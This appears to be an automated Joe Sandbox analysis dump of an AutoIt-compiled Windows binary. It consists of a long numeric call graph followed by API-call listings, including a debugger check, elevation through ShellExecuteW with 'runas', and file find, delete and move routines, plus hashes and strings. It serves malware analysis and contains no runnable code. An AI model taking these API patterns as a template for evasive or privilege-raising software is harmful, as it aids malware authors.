101109->101126 101112->101109 101113 5358df 101112->101113 101113->101097 101127 538c88 58 API calls __getptd_noexit 101115->101127 101116->101108 101128 538c88 58 API calls __getptd_noexit 101119->101128 101121->101097 101122->101101 101123->101103 101124->101108 101125->101108 101126->101109 101127->101119 101128->101113 101129->101107 101130->101113 101132 52542d __ftell_nolock 101131->101132 101133 521821 59 API calls 101132->101133 101138 525590 Mailbox 101132->101138 101135 52545f 101133->101135 101144 525495 Mailbox 101135->101144 101196 521609 101135->101196 101136 525563 101137 521a36 59 API calls 101136->101137 101136->101138 101139 525584 101137->101139 101138->100857 101141 524c94 59 API calls 101139->101141 101140 521a36 59 API calls 101140->101144 101141->101138 101142 521609 59 API calls 101142->101144 
101144->101136 101144->101138 101144->101140 101144->101142 101199 524c94 101144->101199 101146 5219fb 101145->101146 101148 5219ee 101145->101148 101147 530f16 Mailbox 59 API calls 101146->101147 101147->101148 101148->100859 101150 521ca7 101149->101150 101151 521caf 101149->101151 101209 521bcc 101150->101209 101153 51477a 101151->101153 101154 530f16 Mailbox 59 API calls 101153->101154 101155 514787 101154->101155 101155->100864 101157 5139c9 101156->101157 101158 5139f0 101157->101158 101213 513ea3 101157->101213 101158->100867 101161 5255c6 101160->101161 101162 5255df 101160->101162 101164 521c9c 59 API calls 101161->101164 101163 521821 59 API calls 101162->101163 101165 524fa0 101163->101165 101164->101165 101166 53305f 101165->101166 101167 5330e0 101166->101167 101168 53306b 101166->101168 101243 5330f2 60 API calls 4 library calls 101167->101243 101172 533090 101168->101172 101241 538c88 58 API calls __getptd_noexit 101168->101241 101171 5330ed 101171->100877 101172->100877 101173 533077 101242 538f16 9 API calls __cftoe2_l 101173->101242 101175 533082 101175->100877 101177 5147c6 101176->101177 101178 530f16 Mailbox 59 API calls 101177->101178 101179 5147d4 101178->101179 101180 5147e0 101179->101180 101244 5146ec 59 API calls Mailbox 101179->101244 101182 514540 101180->101182 101245 514650 101182->101245 101184 51454f 101185 530f16 Mailbox 59 API calls 101184->101185 101186 5145eb 101184->101186 101185->101186 101187 5143d0 101186->101187 101188 54d5f9 101187->101188 101190 5143e7 101187->101190 101188->101190 101259 5140cb 59 API calls Mailbox 101188->101259 101191 514530 101190->101191 101192 5144e8 101190->101192 101195 5144ef 101190->101195 101193 51523c 59 API calls 101191->101193 101194 530f16 Mailbox 59 API calls 101192->101194 101193->101195 101194->101195 101195->100918 101205 521aa4 101196->101205 101198 521614 101198->101135 101200 524ca2 101199->101200 101204 524cc4 _memmove 101199->101204 101202 530f16 Mailbox 59 API calls 101200->101202 
101201 530f16 Mailbox 59 API calls 101203 524cd8 101201->101203 101202->101204 101203->101144 101204->101201 101206 521ab7 101205->101206 101208 521ab4 _memmove 101205->101208 101207 530f16 Mailbox 59 API calls 101206->101207 101207->101208 101208->101198 101210 521bef _memmove 101209->101210 101211 521bdc 101209->101211 101210->101151 101211->101210 101212 530f16 Mailbox 59 API calls 101211->101212 101212->101210 101229 513c30 101213->101229 101215 513eb3 101216 513f2d 101215->101216 101217 513ebd 101215->101217 101237 51523c 101216->101237 101218 530f16 Mailbox 59 API calls 101217->101218 101220 513ece 101218->101220 101222 513edc 101220->101222 101223 521207 59 API calls 101220->101223 101221 513f1d 101221->101158 101224 513eeb 101222->101224 101225 521bcc 59 API calls 101222->101225 101223->101222 101226 530f16 Mailbox 59 API calls 101224->101226 101225->101224 101227 513ef5 101226->101227 101236 513bc8 68 API calls 101227->101236 101230 513e11 101229->101230 101231 513c43 101229->101231 101230->101215 101232 521207 59 API calls 101231->101232 101235 513c54 101231->101235 101233 513e73 101232->101233 101234 532ea0 __cinit 67 API calls 101233->101234 101234->101235 101235->101215 101236->101221 101238 51524a 101237->101238 101239 515250 101237->101239 101238->101239 101240 521c9c 59 API calls 101238->101240 101239->101221 101240->101239 101241->101173 101242->101175 101243->101171 101244->101180 101246 514659 Mailbox 101245->101246 101247 54d61c 101246->101247 101251 514663 101246->101251 101249 530f16 Mailbox 59 API calls 101247->101249 101248 51466a 101248->101184 101250 54d628 101249->101250 101251->101248 101253 515190 101251->101253 101254 51519b 101253->101254 101255 5151d2 101254->101255 101258 5141c4 59 API calls Mailbox 101254->101258 101255->101251 101257 5151fd 101257->101251 101258->101257 101259->101190 101322 541aa0 101260->101322 101263 5301db 101266 521821 59 API calls 101263->101266 101264 5301f8 101265 5219e1 59 API calls 101264->101265 101267 
5301e7 101265->101267 101266->101267 101324 52133d 101267->101324 101270 5308f0 101271 541aa0 __ftell_nolock 101270->101271 101272 5308fd GetLongPathNameW 101271->101272 101273 521821 59 API calls 101272->101273 101274 5231f7 101273->101274 101275 522f3d 101274->101275 101276 521207 59 API calls 101275->101276 101277 522f4f 101276->101277 101278 5301af 60 API calls 101277->101278 101279 522f5a 101278->101279 101280 522f65 101279->101280 101283 5600f7 101279->101283 101282 524c94 59 API calls 101280->101282 101284 522f71 101282->101284 101286 560111 101283->101286 101338 52151f 101283->101338 101332 511307 101284->101332 101287 522f84 Mailbox 101287->100934 101348 5249c2 101288->101348 101291 55f856 101465 579983 101291->101465 101292 5249c2 136 API calls 101294 5227c3 101292->101294 101294->101291 101296 5227cb 101294->101296 101300 5227d7 101296->101300 101301 55f873 101296->101301 101297 55f888 101299 530f16 Mailbox 59 API calls 101297->101299 101298 55f86b 101523 524a2f 101298->101523 101311 55f8cd Mailbox 101299->101311 101372 5229be 101300->101372 101529 574655 90 API calls _wprintf 101301->101529 101306 55f881 101306->101297 101307 55fa81 101308 532eb5 _free 58 API calls 101307->101308 101309 55fa89 101308->101309 101310 524a2f 84 API calls 101309->101310 101316 55fa92 101310->101316 101311->101307 101311->101316 101319 521a36 59 API calls 101311->101319 101500 56fcdb 101311->101500 101503 5777a7 101311->101503 101509 52343f 101311->101509 101517 523297 101311->101517 101530 56fbfc 61 API calls 2 library calls 101311->101530 101315 532eb5 _free 58 API calls 101315->101316 101316->101315 101317 524a2f 84 API calls 101316->101317 101531 56fd3f 89 API calls 4 library calls 101316->101531 101317->101316 101319->101311 101323 5301bc GetFullPathNameW 101322->101323 101323->101263 101323->101264 101325 52134b 101324->101325 101328 521981 101325->101328 101327 52135b 101327->101270 101329 521998 _memmove 101328->101329 101330 52198f 101328->101330 101329->101327 
101330->101329 101331 521aa4 59 API calls 101330->101331 101331->101329 101333 511319 101332->101333 101337 511338 _memmove 101332->101337 101335 530f16 Mailbox 59 API calls 101333->101335 101334 530f16 Mailbox 59 API calls 101336 51134f 101334->101336 101335->101337 101336->101287 101337->101334 101341 5214db 101338->101341 101342 5214e9 CompareStringW 101341->101342 101347 55f190 101341->101347 101345 52150c 101342->101345 101344 55f1df 101345->101283 101346 534de8 60 API calls 101346->101347 101347->101344 101347->101346 101532 524b29 101348->101532 101353 56083b 101356 524a2f 84 API calls 101353->101356 101354 5249ed LoadLibraryExW 101542 524ade 101354->101542 101358 560842 101356->101358 101360 524ade 3 API calls 101358->101360 101362 56084a 101360->101362 101361 524a14 101361->101362 101363 524a20 101361->101363 101568 524ab2 101362->101568 101365 524a2f 84 API calls 101363->101365 101367 5227af 101365->101367 101367->101291 101367->101292 101369 560871 101576 524a6e 101369->101576 101373 55fc94 101372->101373 101374 5229e7 101372->101374 102003 56fd3f 89 API calls 4 library calls 101373->102003 101936 523df7 60 API calls Mailbox 101374->101936 101377 522a09 101937 523e47 67 API calls 101377->101937 101378 55fca7 102004 56fd3f 89 API calls 4 library calls 101378->102004 101380 522a1e 101380->101378 101382 522a26 101380->101382 101384 521207 59 API calls 101382->101384 101383 55fcc3 101414 522a93 101383->101414 101385 522a32 101384->101385 101938 530ab6 60 API calls __ftell_nolock 101385->101938 101387 522a3e 101390 521207 59 API calls 101387->101390 101388 522aa1 101392 521207 59 API calls 101388->101392 101389 55fcd6 101391 5242cf CloseHandle 101389->101391 101393 522a4a 101390->101393 101394 55fce2 101391->101394 101395 522aaa 101392->101395 101396 5301af 60 API calls 101393->101396 101397 5249c2 136 API calls 101394->101397 101398 521207 59 API calls 101395->101398 101399 522a58 101396->101399 101403 55fcfe 101397->101403 101400 522ab3 101398->101400 
101939 523ea1 ReadFile SetFilePointerEx 101399->101939 101941 530044 101400->101941 101402 55fd23 102005 56fd3f 89 API calls 4 library calls 101402->102005 101403->101402 101407 579983 122 API calls 101403->101407 101406 522a84 101940 52410a SetFilePointerEx SetFilePointerEx 101406->101940 101412 55fd16 101407->101412 101408 522aca 101409 5217e0 59 API calls 101408->101409 101413 522adb SetCurrentDirectoryW 101409->101413 101410 55fd3a 101443 522c3e Mailbox 101410->101443 101415 55fd3f 101412->101415 101416 55fd1e 101412->101416 101421 522aee Mailbox 101413->101421 101414->101388 101414->101389 101417 524a2f 84 API calls 101415->101417 101418 524a2f 84 API calls 101416->101418 101419 55fd44 101417->101419 101418->101402 101420 530f16 Mailbox 59 API calls 101419->101420 101427 55fd78 101420->101427 101423 530f16 Mailbox 59 API calls 101421->101423 101425 522b01 101423->101425 101424 5227ef 101424->100807 101424->100831 101426 52433f 59 API calls 101425->101426 101454 522b0c Mailbox __NMSG_WRITE 101426->101454 101428 52343f 59 API calls 101427->101428 101462 55fdc1 Mailbox 101428->101462 101429 522c19 101999 5242cf 101429->101999 101432 55ffb2 102008 577707 101432->102008 101433 522c25 SetCurrentDirectoryW 101433->101443 101436 55ffd4 102012 570267 59 API calls 2 library calls 101436->102012 101439 55ffe1 101441 532eb5 _free 58 API calls 101439->101441 101440 56004b 102015 56fd3f 89 API calls 4 library calls 101440->102015 101441->101443 101931 523e25 101443->101931 101445 52343f 59 API calls 101445->101462 101446 560064 101446->101429 101448 560043 102014 56fb95 59 API calls 4 library calls 101448->102014 101451 521a36 59 API calls 101451->101454 101452 56fcdb 59 API calls 101452->101462 101454->101429 101454->101440 101454->101448 101454->101451 101992 523ebe 67 API calls _wcscpy 101454->101992 101993 522e8f GetStringTypeW 101454->101993 101994 522dfe 60 API calls __wcsnicmp 101454->101994 101995 522edc GetStringTypeW __NMSG_WRITE 101454->101995 101996 53379f 
GetStringTypeW _iswctype 101454->101996 101997 5227fc 165 API calls 3 library calls 101454->101997 101998 52314d 59 API calls Mailbox 101454->101998 101455 521a36 59 API calls 101455->101462 101457 5777a7 59 API calls 101457->101462 101459 560004 102013 56fd3f 89 API calls 4 library calls 101459->102013 101461 56001d 101463 532eb5 _free 58 API calls 101461->101463 101462->101432 101462->101445 101462->101452 101462->101455 101462->101457 101462->101459 102006 56fbfc 61 API calls 2 library calls 101462->102006 102007 52314d 59 API calls Mailbox 101462->102007 101464 560030 101463->101464 101464->101443 101466 524a8c 85 API calls 101465->101466 101467 5799f2 101466->101467 102034 579b5e 101467->102034 101470 524ab2 74 API calls 101471 579a21 101470->101471 101472 524ab2 74 API calls 101471->101472 101473 579a31 101472->101473 101474 524ab2 74 API calls 101473->101474 101475 579a4c 101474->101475 101476 524ab2 74 API calls 101475->101476 101477 579a67 101476->101477 101478 524a8c 85 API calls 101477->101478 101479 579a7e 101478->101479 101480 53586c _W_store_winword 58 API calls 101479->101480 101481 579a85 101480->101481 101482 53586c _W_store_winword 58 API calls 101481->101482 101483 579a8f 101482->101483 101484 524ab2 74 API calls 101483->101484 101485 579aa3 101484->101485 101486 579531 GetSystemTimeAsFileTime 101485->101486 101487 579ab6 101486->101487 101488 579ae0 101487->101488 101489 579acb 101487->101489 101491 579ae6 101488->101491 101492 579b45 101488->101492 101490 532eb5 _free 58 API calls 101489->101490 101493 579ad1 101490->101493 102040 578f2e 116 API calls __fcloseall 101491->102040 101495 532eb5 _free 58 API calls 101492->101495 101496 532eb5 _free 58 API calls 101493->101496 101498 55f867 101495->101498 101496->101498 101497 579b3d 101499 532eb5 _free 58 API calls 101497->101499 101498->101297 101498->101298 101499->101498 101501 530f16 Mailbox 59 API calls 101500->101501 101502 56fd0b _memmove 101501->101502 101502->101311 101504 5777b2 
101503->101504 101505 530f16 Mailbox 59 API calls 101504->101505 101506 5777c9 101505->101506 101507 521a36 59 API calls 101506->101507 101508 5777d8 101506->101508 101507->101508 101508->101311 101510 5234df 101509->101510 101516 523452 _memmove 101509->101516 101512 530f16 Mailbox 59 API calls 101510->101512 101511 530f16 Mailbox 59 API calls 101513 523459 101511->101513 101512->101516 101514 523482 101513->101514 101515 530f16 Mailbox 59 API calls 101513->101515 101514->101311 101515->101514 101516->101511 101518 5232aa 101517->101518 101520 523358 101517->101520 101519 530f16 Mailbox 59 API calls 101518->101519 101522 5232dc 101518->101522 101519->101522 101520->101311 101521 530f16 59 API calls Mailbox 101521->101522 101522->101520 101522->101521 101524 524a40 101523->101524 101525 524a39 101523->101525 101527 524a60 FreeLibrary 101524->101527 101528 524a4f 101524->101528 102041 5354f6 101525->102041 101527->101528 101528->101301 101529->101306 101530->101311 101531->101316 101581 524b77 101532->101581 101535 524b50 101536 524b60 FreeLibrary 101535->101536 101537 5249d4 101535->101537 101536->101537 101539 5353ab 101537->101539 101538 524b77 2 API calls 101538->101535 101585 5353c0 101539->101585 101541 5249e1 101541->101353 101541->101354 101666 524baa 101542->101666 101545 524b03 101546 524b15 FreeLibrary 101545->101546 101547 524a05 101545->101547 101546->101547 101549 5248b0 101547->101549 101548 524baa 2 API calls 101548->101545 101550 530f16 Mailbox 59 API calls 101549->101550 101551 5248c5 101550->101551 101670 52433f 101551->101670 101553 5248d1 _memmove 101554 56078a 101553->101554 101555 52490c 101553->101555 101556 560797 101554->101556 101678 579d45 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 101554->101678 101557 524a6e 69 API calls 101555->101557 101679 579dcb 95 API calls 101556->101679 101560 524915 101557->101560 101561 524ab2 74 API calls 101560->101561 101564 5607d9 101560->101564 101565 524a8c 85 API calls 
101560->101565 101567 5249a0 101560->101567 101561->101560 101673 524a8c 101564->101673 101565->101560 101566 524ab2 74 API calls 101566->101567 101567->101361 101569 524ac4 101568->101569 101572 5608c5 101568->101572 101785 535732 101569->101785 101573 579531 101910 579387 101573->101910 101575 579547 101575->101369 101577 560888 101576->101577 101578 524a7d 101576->101578 101915 535db0 101578->101915 101580 524a85 101582 524b44 101581->101582 101583 524b80 LoadLibraryA 101581->101583 101582->101535 101582->101538 101583->101582 101584 524b91 GetProcAddress 101583->101584 101584->101582 101588 5353cc __setmbcp 101585->101588 101586 5353df 101634 538c88 58 API calls __getptd_noexit 101586->101634 101588->101586 101590 535410 101588->101590 101589 5353e4 101635 538f16 9 API calls __cftoe2_l 101589->101635 101604 540648 101590->101604 101593 535415 101594 53542b 101593->101594 101595 53541e 101593->101595 101597 535455 101594->101597 101598 535435 101594->101598 101636 538c88 58 API calls __getptd_noexit 101595->101636 101619 540767 101597->101619 101637 538c88 58 API calls __getptd_noexit 101598->101637 101599 5353ef @_EH4_CallFilterFunc@8 __setmbcp 101599->101541 101605 540654 __setmbcp 101604->101605 101606 539d6b __lock 58 API calls 101605->101606 101617 540662 101606->101617 101607 5406d6 101639 54075e 101607->101639 101608 5406dd 101644 53897d 58 API calls 2 library calls 101608->101644 101611 540753 __setmbcp 101611->101593 101612 5406e4 101612->101607 101645 539f8b InitializeCriticalSectionAndSpinCount 101612->101645 101613 539df3 __mtinitlocknum 58 API calls 101613->101617 101616 54070a EnterCriticalSection 101616->101607 101617->101607 101617->101608 101617->101613 101642 536dad 59 API calls __lock 101617->101642 101643 536e17 LeaveCriticalSection LeaveCriticalSection _doexit 101617->101643 101620 540787 __wopenfile 101619->101620 101621 5407a1 101620->101621 101633 54095c 101620->101633 101652 53392b 60 API calls 3 library calls 101620->101652 101650 
538c88 58 API calls __getptd_noexit 101621->101650 101623 5407a6 101651 538f16 9 API calls __cftoe2_l 101623->101651 101625 535460 101638 535482 LeaveCriticalSection LeaveCriticalSection __wfsopen 101625->101638 101626 5409bf 101647 548701 101626->101647 101629 540955 101629->101633 101653 53392b 60 API calls 3 library calls 101629->101653 101631 540974 101631->101633 101654 53392b 60 API calls 3 library calls 101631->101654 101633->101621 101633->101626 101634->101589 101635->101599 101636->101599 101637->101599 101638->101599 101646 539ed5 LeaveCriticalSection 101639->101646 101641 540765 101641->101611 101642->101617 101643->101617 101644->101612 101645->101616 101646->101641 101655 547ee5 101647->101655 101649 54871a 101649->101625 101650->101623 101651->101625 101652->101629 101653->101631 101654->101633 101656 547ef1 __setmbcp 101655->101656 101657 547f07 101656->101657 101660 547f3d 101656->101660 101658 538c88 ___libm_error_support 58 API calls 101657->101658 101659 547f0c 101658->101659 101662 538f16 __cftoe2_l 9 API calls 101659->101662 101661 547fae __wsopen_nolock 109 API calls 101660->101661 101663 547f59 101661->101663 101665 547f16 __setmbcp 101662->101665 101664 547f82 __wsopen_helper LeaveCriticalSection 101663->101664 101664->101665 101665->101649 101667 524af7 101666->101667 101668 524bb3 LoadLibraryA 101666->101668 101667->101545 101667->101548 101668->101667 101669 524bc4 GetProcAddress 101668->101669 101669->101667 101671 530f16 Mailbox 59 API calls 101670->101671 101672 524351 101671->101672 101672->101553 101674 5608a3 101673->101674 101675 524a9b 101673->101675 101680 53599d 101675->101680 101677 524aa9 101677->101566 101678->101556 101679->101560 101684 5359a9 __setmbcp 101680->101684 101681 5359bb 101711 538c88 58 API calls __getptd_noexit 101681->101711 101683 5359e1 101693 536d6e 101683->101693 101684->101681 101684->101683 101686 5359c0 101712 538f16 9 API calls __cftoe2_l 101686->101712 101692 5359cb __setmbcp 101692->101677 101694 
536da0 EnterCriticalSection 101693->101694 101695 536d7e 101693->101695 101696 5359e7 101694->101696 101695->101694 101697 536d86 101695->101697 101699 53590e 101696->101699 101698 539d6b __lock 58 API calls 101697->101698 101698->101696 101700 53592c 101699->101700 101701 53591c 101699->101701 101703 535942 101700->101703 101714 535a20 101700->101714 101784 538c88 58 API calls __getptd_noexit 101701->101784 101743 534b8d 101703->101743 101704 535921 101713 535a18 LeaveCriticalSection LeaveCriticalSection __wfsopen 101704->101713 101709 535983 101756 54178f 101709->101756 101711->101686 101712->101692 101713->101692 101715 535a2d __ftell_nolock 101714->101715 101716 535a45 101715->101716 101717 535a5d 101715->101717 101718 538c88 ___libm_error_support 58 API calls 101716->101718 101719 534836 __stbuf 58 API calls 101717->101719 101721 535a4a 101718->101721 101720 535a65 101719->101720 101723 54178f __write 64 API calls 101720->101723 101722 538f16 __cftoe2_l 9 API calls 101721->101722 101741 535a55 101722->101741 101724 535a81 101723->101724 101727 535c71 101724->101727 101729 535b04 101724->101729 101724->101741 101725 53c756 __cftoe2_l 6 API calls 101726 535dac 101725->101726 101726->101703 101728 535c7a 101727->101728 101733 535c2d 101727->101733 101730 538c88 ___libm_error_support 58 API calls 101728->101730 101731 535b2a 101729->101731 101729->101733 101730->101741 101732 541925 __lseeki64 62 API calls 101731->101732 101731->101741 101734 535b63 101732->101734 101735 54178f __write 64 API calls 101733->101735 101733->101741 101736 535b8f ReadFile 101734->101736 101734->101741 101737 535cde 101735->101737 101738 535bb4 101736->101738 101736->101741 101740 54178f __write 64 API calls 101737->101740 101737->101741 101739 54178f __write 64 API calls 101738->101739 101742 535bc7 101739->101742 101740->101741 101741->101725 101742->101741 101744 534ba0 101743->101744 101745 534bc4 101743->101745 101744->101745 101746 534836 __stbuf 58 API calls 101744->101746 101749 
534836 101745->101749 101747 534bbd 101746->101747 101748 53d9e6 __write 78 API calls 101747->101748 101748->101745 101750 534840 101749->101750 101751 534855 101749->101751 101752 538c88 ___libm_error_support 58 API calls 101750->101752 101751->101709 101753 534845 101752->101753 101754 538f16 __cftoe2_l 9 API calls 101753->101754 101755 534850 101754->101755 101755->101709 101757 54179b __setmbcp 101756->101757 101758 5417bf 101757->101758 101759 5417a8 101757->101759 101761 54185e 101758->101761 101763 5417d3 101758->101763 101760 538c54 __read 58 API calls 101759->101760 101762 5417ad 101760->101762 101764 538c54 __read 58 API calls 101761->101764 101765 538c88 ___libm_error_support 58 API calls 101762->101765 101766 5417f1 101763->101766 101767 5417fb 101763->101767 101768 5417f6 101764->101768 101773 5417b4 __setmbcp 101765->101773 101769 538c54 __read 58 API calls 101766->101769 101770 53d366 ___lock_fhandle 59 API calls 101767->101770 101772 538c88 ___libm_error_support 58 API calls 101768->101772 101769->101768 101771 541801 101770->101771 101774 541814 101771->101774 101775 541827 101771->101775 101776 54186a 101772->101776 101773->101704 101777 54187e __lseek_nolock 62 API calls 101774->101777 101779 538c88 ___libm_error_support 58 API calls 101775->101779 101778 538f16 __cftoe2_l 9 API calls 101776->101778 101780 541820 101777->101780 101778->101773 101781 54182c 101779->101781 101783 541856 __write LeaveCriticalSection 101780->101783 101782 538c54 __read 58 API calls 101781->101782 101782->101780 101783->101773 101784->101704 101788 53574d 101785->101788 101787 524ad5 101787->101573 101789 535759 __setmbcp 101788->101789 101790 535794 __setmbcp 101789->101790 101791 53576f _memset 101789->101791 101792 53579c 101789->101792 101790->101787 101815 538c88 58 API calls __getptd_noexit 101791->101815 101793 536d6e __lock_file 59 API calls 101792->101793 101794 5357a2 101793->101794 101801 53556d 101794->101801 101796 535789 101816 538f16 9 API calls 
__cftoe2_l 101796->101816 101803 535588 _memset 101801->101803 101808 5355a3 101801->101808 101802 535593 101906 538c88 58 API calls __getptd_noexit 101802->101906 101803->101802 101803->101808 101813 5355e3 101803->101813 101805 535598 101907 538f16 9 API calls __cftoe2_l 101805->101907 101817 5357d6 LeaveCriticalSection LeaveCriticalSection __wfsopen 101808->101817 101809 5356f4 _memset 101909 538c88 58 API calls __getptd_noexit 101809->101909 101811 534836 __stbuf 58 API calls 101811->101813 101813->101808 101813->101809 101813->101811 101818 540fbe 101813->101818 101886 540d07 101813->101886 101908 540e28 58 API calls 4 library calls 101813->101908 101815->101796 101816->101790 101817->101790 101819 540ff6 101818->101819 101820 540fdf 101818->101820 101821 54172e 101819->101821 101825 541030 101819->101825 101822 538c54 __read 58 API calls 101820->101822 101823 538c54 __read 58 API calls 101821->101823 101824 540fe4 101822->101824 101826 541733 101823->101826 101827 538c88 ___libm_error_support 58 API calls 101824->101827 101828 541038 101825->101828 101836 54104f 101825->101836 101829 538c88 ___libm_error_support 58 API calls 101826->101829 101832 540feb 101827->101832 101830 538c54 __read 58 API calls 101828->101830 101831 541044 101829->101831 101833 54103d 101830->101833 101834 538f16 __cftoe2_l 9 API calls 101831->101834 101832->101813 101838 538c88 ___libm_error_support 58 API calls 101833->101838 101834->101832 101835 541064 101839 538c54 __read 58 API calls 101835->101839 101836->101832 101836->101835 101837 54107e 101836->101837 101841 54109c 101836->101841 101837->101835 101840 541089 101837->101840 101838->101831 101839->101833 101844 545dcb __stbuf 58 API calls 101840->101844 101842 53897d __malloc_crt 58 API calls 101841->101842 101843 5410ac 101842->101843 101846 5410b4 101843->101846 101847 5410cf 101843->101847 101845 54119d 101844->101845 101848 541216 ReadFile 101845->101848 101851 5411b3 GetConsoleMode 101845->101851 101850 538c88 

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                          • IsDebuggerPresent.KERNEL32 ref: 0052527E
                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0051BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00560AAE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00560AE6
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C5230), ref: 00560B69
                          • ShellExecuteW.SHELL32(00000000), ref: 00560B70
                            • Part of subcall function 0052514C: GetSysColorBrush.USER32(0000000F), ref: 00525156
                            • Part of subcall function 0052514C: LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                            • Part of subcall function 0052514C: LoadIconW.USER32(00000063), ref: 0052517C
                            • Part of subcall function 0052514C: LoadIconW.USER32(000000A4), ref: 0052518E
                            • Part of subcall function 0052514C: LoadIconW.USER32(000000A2), ref: 005251A0
                            • Part of subcall function 0052514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                            • Part of subcall function 0052514C: RegisterClassExW.USER32(?), ref: 0052521C
                            • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                            • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                            • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 0052513E
                            • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 00525147
                            • Part of subcall function 005259D3: _memset.LIBCMT ref: 005259F9
                            • Part of subcall function 005259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                          Strings
                          • runas, xrefs: 00560B64
                          • AutoIt, xrefs: 00560AA3
                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00560AA8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                          • API String ID: 529118366-2030392706
                          • Opcode ID: f35754c470590cdd1da6bdbd377779971c8b956c3ce9fa4a80557cbd155daeb9
                          • Instruction ID: 11a1718e7832c7a1a995a35dc8921065a0aaaa081d56c847c68b67e1859ce21c
                          • Opcode Fuzzy Hash: f35754c470590cdd1da6bdbd377779971c8b956c3ce9fa4a80557cbd155daeb9
                          • Instruction Fuzzy Hash: B051253490425AAACB21EBB4EC49EFE7F78BFAA340B045067F451621E2EB745549DB20

                          Control-flow Graph

                          APIs
                            • Part of subcall function 005301AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005301CF
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00573C03
                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00573CAB
                          • MoveFileW.KERNEL32(?,?), ref: 00573CBE
                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00573CDB
                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00573CFD
                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00573D19
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 4002782344-1173974218
                          • Opcode ID: fb5a45cfb64f74325089b3d430a80f646b186cedcb9d343981698b4da858eeb7
                          • Instruction ID: de10e648fd255af1fdc0d7360f93db0c7ab73ca68f9aa18d032866172b9ad110
                          • Opcode Fuzzy Hash: fb5a45cfb64f74325089b3d430a80f646b186cedcb9d343981698b4da858eeb7
                          • Instruction Fuzzy Hash: 0A51853180111E9ACF15EBA0EA5A9EEBB79BF61310F204165E446B30D1EF315F09EB64

                          Control-flow Graph

                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00525D40
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • GetCurrentProcess.KERNEL32(?,005A0A18,00000000,00000000,?), ref: 00525E07
                          • IsWow64Process.KERNEL32(00000000), ref: 00525E0E
                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 00525E54
                          • FreeLibrary.KERNEL32(00000000), ref: 00525E5F
                          • GetSystemInfo.KERNEL32(00000000), ref: 00525E90
                          • GetSystemInfo.KERNEL32(00000000), ref: 00525E9C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
